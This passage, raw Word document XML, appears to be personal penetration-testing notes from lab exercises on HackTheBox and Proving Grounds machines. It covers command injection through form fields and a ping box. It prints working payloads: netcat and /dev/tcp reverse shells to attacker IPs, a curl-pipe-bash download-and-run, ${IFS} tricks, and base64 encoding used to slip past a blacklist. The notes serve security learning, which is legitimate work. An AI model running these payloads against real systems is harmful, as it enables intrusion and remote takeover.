      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is a comment and then it's followed by /n to make a new line. The comment here is called a shebang and the shebang ensures the script is interpreted by the correct shell (Bash in this case). Without it, the system might use the default shell (often /bin/sh), which might not support all Bash-specific syntax.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D88">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D89">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nc -lnvp 4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D8A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D8B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">test;curl${IFS}http://&lt;IP&gt;:&lt;PORT&gt;/rev.sh|bash;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D8C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="276"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Put this in username field and press enter</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D8D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bash reverse shell for command injection (from Headless HTB):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D90">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1151"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nc 10.10.14.41 4444 -e /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D91">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1151"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">+nc+10.10.14.41+4444+-e+/bin/bash </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D92">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1151"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For URL encoding</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D93">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1151"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is what the whole request body looked like:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D94">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1151"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">date=2023-09-15;+nc+10.10.14.41+4444+-e+/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D95">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D96">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D97">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_6xjb5ayfzaim" w:id="119"/>
      <w:bookmarkEnd w:id="119"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using the | (pipe) for command injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D98">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId289">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">NoName</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play, we finally saw a new method of command injection! We had a "ping" functionality, where we type in an IP address inside of a textbox and then press "Submit Query" and then the ping output will show on screen.</w:t>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t xml:space="preserve">So, we submitted this command injection:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D9B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="997"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">127.0.0.1 | id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000D9C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1651000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="16" name="image14.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image14.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId290"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1651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9D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1054"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We got a successful command injection</w:t>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t xml:space="preserve">This is the pipe command, and it will make it so that the "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" command is run. </w:t>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t xml:space="preserve">We then try uploading a reverse shell but it didn't work since there was a blacklist for letters. So, we had to encode base64.</w:t>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pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_xhl7axrvhvdx" w:id="120"/>
      <w:bookmarkEnd w:id="120"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Base64 encoding reverse shell</w:t>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t xml:space="preserve">Example seen in </w:t>
      </w:r>
      <w:hyperlink r:id="rId291">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Zab</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DA6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First they encoded it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo ‘bash -i &gt;&amp; /dev/tcp/192.168.45.154/443 0&gt;&amp;1’ | base64</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DA8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then this was their final payload that they want to be run in bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DA9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQ1LjE1NC80NDMgMD4mMQo= | base64 -d | /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DAA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DAB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DAC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is what the final command should look like:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="213"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo '&lt;BASE64_STRING&gt;' | base64 -d | bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DAE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="213"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You pass this into the command injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DAF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="213"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bash -c "echo &lt;BASE64_STRING&gt; | base64 -d | bash"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DB0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="213"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is the full form, to specify bash, but if it's already running bash then you don't need bash -c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="213"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bash -c</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> means run the following as a command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DB2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="213"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you don't include </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-c</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, then it will think the following is a file that it's supposed to run. Like </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bash example.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DB3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1240"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo -n 'BASE64_STRING' | base64 -d | sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DB5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1240"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You pass this into the command injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1240"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sh -c 'echo -n "BASE64_STRING" | base64 -d | sh'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DB7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1240"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This one is the sh variant </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DB8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DB9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DBA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They used this reverse shell:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DBB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1051"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2&gt;&amp;1|nc 192.168.45.208 443 &gt;/tmp/f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DBC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DBD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Base 64 encode it:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DBE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1016"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo -n &lt;rev_shell&gt; | base64 -d | bash </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DBF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DC0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Start a listener:</w:t>
      </w:r>
    </w:p>
